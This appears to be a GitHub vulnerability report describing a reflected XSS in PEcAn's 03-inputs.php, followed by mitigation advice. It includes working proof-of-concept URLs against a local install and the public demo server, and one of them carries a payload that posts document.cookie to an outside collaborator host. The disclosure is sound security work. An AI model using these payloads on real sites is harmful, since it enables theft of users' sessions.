You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
An unauthenticated user can access the 03-inputs.php and execute a reflected XSS on the site with the payload:
"3cck"><script>alert(1)<%2fscript>zqqf2jvbenj" in the URL parameters: hostname, sitegroupid, lat, lon, and sitename.
To Reproduce
I am hosting on a fresh install through docker. To repeat the steps, go to your pecan.localhost server and paste this path:
The vulnerability occurs when unsanitized input from the user is reflected back on the page without proper validation or escaping. This allows an attacker to inject malicious JavaScript code into the application, which will be executed in the context of the victim's browser.
Screenshots
XSS Execution at pecan.ncsa.illinois.edu
XSS Execution on localhost:
Source code of site with injected values:
In addition to executing JavaScript I can also craft the XSS to steal a users cookie and their session. If I send a payload like so:
When I poll my collaborator in burp suite I get the users cookie information returned to me.
Mitigation:
HttpOnly Flag for Cookies: Ensure sensitive cookies (e.g., session IDs) are marked as HttpOnly so they cannot be accessed via JavaScript.
Content Security Policy (CSP): A properly configured CSP can help mitigate the risk of XSS attacks by restricting where scripts can be loaded from.
Input Sanitization & Output Encoding: Always sanitize user input and properly encode output to prevent malicious JavaScript from being executed in the browser.
Bug Description
An unauthenticated user can access the 03-inputs.php and execute a reflected XSS on the site with the payload:
"3cck"><script>alert(1)<%2fscript>zqqf2jvbenj" in the URL parameters: hostname, sitegroupid, lat, lon, and sitename.
To Reproduce
I am hosting on a fresh install through docker. To repeat the steps, go to your pecan.localhost server and paste this path:
http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj
I was also able to exploit this on your demo at:
http://pecan.ncsa.illinois.edu/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=5000000259&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj
Further description
The vulnerability occurs when unsanitized input from the user is reflected back on the page without proper validation or escaping. This allows an attacker to inject malicious JavaScript code into the application, which will be executed in the context of the victim's browser.
Screenshots
XSS Execution at pecan.ncsa.illinois.edu
XSS Execution on localhost:
Source code of site with injected values:
In addition to executing JavaScript I can also craft the XSS to steal a users cookie and their session. If I send a payload like so:
http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3e%3cscript%3efetch(%27https%3a%2f%2f4v0ed43gg2vq3ckagbmyfdbpigo7cy0n.oastify.com%27%2c%20%7bmethod%3a%20%27POST%27%2cmode%3a%20%27no-cors%27%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3ezqqf2jvbenj
My payload is this in the sitename parameter:
When I poll my collaborator in burp suite I get the users cookie information returned to me.
Mitigation:
HttpOnly Flag for Cookies: Ensure sensitive cookies (e.g., session IDs) are marked as HttpOnly so they cannot be accessed via JavaScript.
Content Security Policy (CSP): A properly configured CSP can help mitigate the risk of XSS attacks by restricting where scripts can be loaded from.
Input Sanitization & Output Encoding: Always sanitize user input and properly encode output to prevent malicious JavaScript from being executed in the browser.
In addition to above you can review more about XSS here: https://portswigger.net/web-security/cross-site-scripting/reflected
In addition, guidance for fixing them here: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
The text was updated successfully, but these errors were encountered: